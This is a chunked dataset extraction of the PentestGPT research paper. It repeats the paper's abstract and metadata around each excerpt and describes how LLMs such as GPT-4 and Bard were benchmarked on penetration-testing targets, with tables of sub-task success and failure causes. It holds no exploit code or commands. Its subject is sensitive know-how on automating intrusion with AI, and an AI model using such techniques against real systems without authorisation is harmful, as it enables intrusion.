In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 22 | (e.g., exploiting SQL injection). To standardize decomposition, we arrange the sub-tasks into a two-layer structure. Initially, we categorize each sub-task according to the five phases of penetration testing, as described in Section 2. Then, we label the sub-task with either the corresponding CWE item it targets or the specific tools employed. These two steps enable us to formulate an exhaustive list of sub-tasks for every benchmark target. We include this list in Appendix 6, and the complete sub-task information is accessible on our anonymous open-source project [18]. Benchmark Validation. The final stage of our benchmark development involves rigorous validation. This step ensures that our benchmark accurately reflects real-world penetra- tion testing scenarios and offers reproducibility. During validation, three certified penetration testers independently | 2308.06782#22 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 23 | 2. Our penetration testers are all Offensive Security Certified Profession- als (OSCP).
5
attempt the penetration testing targets, refining the sub-tasks as needed. We adjust our task decomposition accordingly because some targets may have multiple valid solutions.
By the end, we compile a benchmark of 13 penetration testing targets with 182 sub-tasks in 25 categories. The benchmark includes all types of vulnerabilities as listed in the OWASP [11] Top 10 Project. Detailed information on the included categories is listed in the Appendix Section 6. To contribute to community development, we have made this benchmark publicly available online at our anonymous project website [18].
# 4. Exploratory Study
We conduct an exploratory study to assess the capabil- ities of LLMs in penetration testing. Our primary objective is determining how well LLMs can adapt to the real-world complexities and challenges associated with penetration test- ing tasks. Specifically, we aim to address the following two research questions: RQ1 (Capability): To what extent can LLMs perform pen- etration testing tasks? RQ2 (Comparative Analysis): How do the problem- solving strategies of human penetration testers and LLMs differ?
We utilize the benchmark described in Section 3 to evaluate the performance of LLMs on penetration testing tasks. In the following, we first delineate our testing strategy for this study. Subsequently, we present the testing results and an analytical discussion to address the above research questions. | 2308.06782#23 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 24 | # 4.1. Testing Strategy
LLMs cannot perform penetration tests directly. Their capabilities are primarily text-based, responding to queries and providing suggestions. However, penetration testing of- ten involves operations with user interfaces (UI) and un- derstanding graphical information, such as website images. This necessitates a bridge between the test machine and the LLM to facilitate task completion.
We introduce an interactive loop structure to evaluate the LLMâs abilities in penetration testing within our benchmark. This process, depicted in Figure 2, consists of the following stages: â¶ We present the target information to the LLM and request recommendations for penetration testing actions. This initiates a looped testing procedure. â· We implement the actions suggested by the LLM, which encompass both terminal commands and graphical interactions. ⸠We gather the results of the actions. Text-based output, such as terminal responses or source code, is recorded directly. Human pen- etration testers provide concise summaries and descriptions for non-textual results (e.g., images). The summarized infor- mation is returned to the LLM to inform subsequent actions. â¹ This cycle continues until we identify a solution or reach a standstill. We compile a record of the testing procedures, encompassing successful tasks, ineffective actions, and any reasons for failure, if applicable.
TABLE 1: Overall performance of LLMs on Penetration Testing Benchmark. | 2308.06782#24 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 25 | TABLE 1: Overall performance of LLMs on Penetration Testing Benchmark.
Easy Medium Hard Average Tools Overall (7) Sub-task (77) Overall (4) Sub-task (71) Overall (2) Sub-task (34) Overall (13) Sub-task (182) GPT-3.5 GPT-4 Bard 1 (14.29%) 4 (57.14%) 2 (28.57%) 24 (31.17%) 52 (67.53%) 29 (37.66%) 0 (0.00%) 1 (25.00%) 0 (0.00%) 13 (18.31%) 27 (38.03%) 16 (22.54%) 0 (0.00%) 0 (0.00%) 0 (0.00%) 5 (14.71%) 8 (23.53%) 5 (14.71%) 1 (7.69%) 5 (38.46%) 2 (15.38%) 42 (23.07%) 87 (47.80%) 50 (27.47%) Average 2.3 (33.33%) 35 (45.45%) 0.33 (8.33%) 18.7 (26.29%) 0 (0.00%) 6 (17.64%) 2.7 (20.5%) 59.7 (32.78%)
Penetration Testing Goal Q (e}) Human Expert Flag and Conclusion Obtained 1 1 1 1 | © Data D Entity | 2308.06782#25 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 26 | Penetration Testing Goal Q (e}) Human Expert Flag and Conclusion Obtained 1 1 1 1 | © Data D Entity
Figure 2: Overview of strategy to use LLMs for penetration testing.
ners such as Nexus [30] and OpenVAS [31]. Consequently, we explicitly instruct the LLMs to refrain from using these tools. However, we follow the LLMsâ recommendations for utilizing other tools designed to validate specific vulnerabil- ity types (e.g., sqlmap [32] for SQL injections). Occasion- ally, versioning discrepancies may lead the LLMs to provide incorrect instructions for tool usage. In such instances, our penetration testing experts evaluate whether the instructions would have been valid for a previous version of the tool. They then make any necessary adjustments to ensure the toolâs correct operation.
# 4.2. Evaluation Settings
# 4.3. Capability Evaluation (RQ1) | 2308.06782#26 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 27 | We proceed to assess the performances of various LLMs in penetration testing tasks using the strategy mentioned above. Model Selection. Our study focuses on three cutting-edge LLMs that are currently accessible: GPT-3.5 and GPT-4 from OpenAI and LaMDA [27] from Google. These models are selected based on their prominence in the research com- munity and consistent availability. To interact with the LLMs mentioned above, we utilize chatbot services provided by OpenAI and Google, namely ChatGPT [28] and Bard [14]. For this paper, the terms GPT-3.5, GPT-4, and Bard will represent these three LLMs. Experimental Setup. We conduct our experiments in a local environment where the target and testing machines are part of the same private network. The testing machine operates on Kali Linux [29], version 2023.1. Several measures are implemented to validate the effectiveness of our testing procedures. First, we repeat the tests to account for inherent variability in the LLM outputs. In particular, we test each target with each LLM five times. We performed 195 tests in total, i.e., 5 repetitions * 3 models * 13 targets. In this process, a sub-task is considered successful if | 2308.06782#27 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 28 | times. We performed 195 tests in total, i.e., 5 repetitions * 3 models * 13 targets. In this process, a sub-task is considered successful if it succeeds in at least one trial, and a penetration task is considered successful as long as one trial succeeds. Second, we make the best efforts to translate UI operations and graphical information into natural languages accurately. In addition, we ensure the precise execution of the instructions provided by the LLMs. Third, we maintain the integrity of the testing process by strictly limiting the testerâs role to executing actions and reporting results without adding expert knowl- edge or guidance. Finally, the testing and target machines are rebooted after each test to reset their states, ensuring a consistent starting point for each test. Tool Usage. Our study aims to assess the innate capabilities of LLMs without reliance on automated vulnerability scanTo study RQ1, we begin by assessing the overall perfor- mance of three prominent LLMs: GPT-4, Bard, and GPT- 3.5. The results of these evaluations are compiled in Table 1. The experimental results show that the three LLMs com- pleted at least one | 2308.06782#28 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 29 | and GPT- 3.5. The results of these evaluations are compiled in Table 1. The experimental results show that the three LLMs com- pleted at least one end-to-end penetration testing task. This achievement underscores their ability to conduct a broad spectrum of testing operations, particularly within environ- ments of less complexity. Among the models, GPT-4 stands out with superior performance, achieving success with 4 targets of easy difficulty and 1 of medium difficulty. Bard and GPT-3.5 also demonstrate commendable capabilities, completing 2 and 1 targets of easy difficulty, respectively. When examining sub-tasks, GPT-4 accomplishes 52 of 77 on easy difficulty targets and 27 out of 71 on medium ones, underlining its potential for significant contributions to more complex penetration testing scenarios. Though not as proficient as GPT-4, GPT-3.5 and Bard still show promise, completing 13 (18.31%) and 16 (22.54%) of sub-tasks on medium difficulty targets, respectively. However, the perfor- mance of all three models noticeably diminishes when chal- lenged with hard difficulty targets. While each model can complete the initial | 2308.06782#29 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 30 | respectively. However, the perfor- mance of all three models noticeably diminishes when chal- lenged with hard difficulty targets. While each model can complete the initial reconnaissance phase on these targets, they fall short in exploiting the identified vulnerability. This outcome is not entirely unexpected, as the hard difficulty machines are deliberately crafted to be exceedingly difficult. They often include services that appear vulnerable but are, in fact, non-exploitableâa trait commonly referred to as rabbit holes [33]. Additionally, the routes to successfully exploiting these machines are typically inventive and unforeseeable, making them resistant to straightforward replication by au- tomated tools. For instance, the benchmark target Falafel involves deliberately crafted SQL injection vulnerabilities, which are resistant to sqlmap and can only be exploited through manually designed payloads. Existing LLMs do | 2308.06782#30 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 31 | 6
not exhibit the capability to solve them solely without the guidance of human experts.
Finding 1: Large Language Models (LLMs) have shown proficiency in conducting end-to-end penetration testing tasks but struggle to overcome challenges presented by more difficult targets.
TABLE 2: Top 10 Types of Sub-tasks completed by each tool.
Sub-Tasks Walkthrough GPT-3.5 GPT-4 General Tool Usage Port Scanning Web Enumeration Code Analysis Shell Construction Directory Exploitation General Privilege Escalation Flag Capture Passowrd/Hash Cracking Network Exploitation 25 9 18 18 11 11 8 8 8 7 4 9 4 4 3 1 2 1 2 1 10 9 8 5 7 7 4 5 4 3 Bard 7 9 4 4 4 1 3 2 2 2 | 2308.06782#31 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 32 | We further examine the detailed sub-task completion performances of the three LLMs, as presented in Table 2. Analyzing the completion status, we identify several areas where LLMs excel. First, they adeptly utilize common pen- etration testing tools to interpret the corresponding outputs, especially in enumeration tasks correctly. For example, all three evaluated LLMs successfully perform all nine Port Scanning sub-tasks. They can configure the widely-used port scanning tool, nmap [25], comprehend the scan results, and formulate subsequent actions. Second, the LLMs reveal a deep understanding of prevalent vulnerability types, con- necting them to the services on the target system. This understanding is evidenced by the successful completion of sub-tasks related to various vulnerability types. Finally, LLMs demonstrate their effectiveness in code analysis and generation, particularly in the tasks of Code Analysis and Shell Construction. These tasks require the models to read and generate codes in different programming languages, essential in penetration testing. This often culminates in identifying potential vulnerabilities from code snippets and crafting the corresponding exploits. Notably, GPT-4 outper- forms the other two models regarding code interpretation and generation, marking it the most suitable candidate for penetration testing tasks.
Finding 2: LLMs can efficiently use penetration test- ing tools, identify common vulnerabilities, and interpret source codes to identify vulnerabilities.
# 4.4. Comparative Analysis (RQ2) | 2308.06782#32 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 33 | Finding 2: LLMs can efficiently use penetration test- ing tools, identify common vulnerabilities, and interpret source codes to identify vulnerabilities.
# 4.4. Comparative Analysis (RQ2)
To address RQ2, we examine the problem-solving strate- gies that LLMs employ, contrasting them with human pen- etration testers. In each penetration testing trial, we concen- trate on two main aspects: (1) Identifying the unnecessary operations that LLMs prompt, which are not conducive to successful penetration testing, as compared to a standard
7
TABLE 3: Top Unnecessary Operations Prompted by LLMs on the Benchmark Targets
Unnecessary Operations GPT-3.5 GPT-4 Bard Total Brute-Force CVE Study SQL Injection Command Injection 75 29 14 18 92 24 21 7 68 28 16 12 235 81 51 37
TABLE 4: Top causes for failed penetration testing trials
Failure Reasons GPT3.5 GPT4 Bard Total Session context lost False Command Generation Deadlock operations False Scanning Output Interpretation False Source Code Interpretation Cannot craft valid exploit 25 23 19 13 16 11 18 12 10 9 11 15 31 20 16 18 10 8 74 55 45 40 37 34
walkthrough; and (2) Understanding the specific factors that prevent LLMs from successfully executing penetration tests. | 2308.06782#33 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
